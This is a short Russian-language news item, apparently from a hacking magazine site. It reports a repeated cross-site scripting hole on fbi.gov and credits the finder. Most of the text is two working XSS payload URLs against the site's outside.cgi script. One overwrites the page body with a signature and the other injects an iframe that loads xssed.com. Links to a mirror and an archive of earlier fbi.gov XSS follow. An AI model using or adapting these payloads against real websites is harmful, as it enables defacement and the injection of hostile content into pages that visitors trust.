Они сделали это, и уже не в первый раз. Ребята предприняли третью или
четвертую попытку прикрепить свой скрипт к странице ФБР! Здесь ты увидишь XSS,
предоставленный Babaconda (работает только в Internet Explorer):

http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML=’xssed’+unescape(‘%20’)+’by’+unescape(‘%20’)+’babaconda'</script>

А вот еще один, специально для фанатов IFrame:

http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>

Здесь — зеркало:


http://www.xssed.com/mirror/46852/

А здесь можно найти предыдущие XSS, связанные с *.fbi.gov:


http://www.xssed.com/archive/domain=fbi.gov



Оставить мнение